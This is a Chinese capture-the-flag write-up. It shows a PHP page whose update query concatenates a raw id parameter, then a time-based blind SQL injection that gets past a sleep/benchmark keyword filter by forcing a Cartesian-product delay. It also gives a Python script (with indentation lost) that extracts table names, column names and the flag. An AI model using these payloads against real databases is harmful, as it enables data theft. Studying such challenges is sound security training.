访问http://52.80.179.198:8080/www.tar.gz 获得源码,在其中的article.php发现了明显的sql注入
<?php
require 'conn.php';
$id = $_GET['id'];
if(preg_match("/(sleep|benchmark|outfile|dumpfile|load_file|join)/i", $_GET['id']))
{
die("you bad bad!");
}
$sql = "select * from article where id='".intval($id)."'";
$res = mysql_query($sql);
if(!$res){
die("404 not found!");
}
$row = mysql_fetch_array($res, MYSQL_ASSOC);
mysql_query("update view set view_times=view_times+1 where id = '".$id." '");
?>
此处虽然select语句处有intval()无法注入,但是update语句明显可以利用,所以考虑时间盲注。虽然sleep和benchmark都被过滤了,但是我们依然可以通过让Mysql进行复杂运算以达到延时的效果,比如可以用字段比较多的表来计算笛卡尔积。测试后发现可以有明显延时,payload:
update view set view_times=view_times+1 where id = '1' and 1 and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C)#
最后的利用脚本:
import requests
import time
while True:
string = "abcdefghijklmnopqrstuvwxyz1234567890:_@,\{\}"
url = "http://52.80.179.198:8080/article.php"
param = {'id': ''}
#payload = "1' and (ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={}) and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C)#"
#payload = "1' and (ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='flags'),{},1))={}) and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C)#"
payload = "1' and (ascii(mid((select group_concat(flag) from flags),{},1))={}) and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C)#"
get = ""
for i in xrange(12, 46):
for j in string:
param['id'] = payload.format(str(i), str(ord(j)))
try:
r = requests.get(url, params = param, timeout = 8)
except:
get += j
print get
time.sleep(2)
break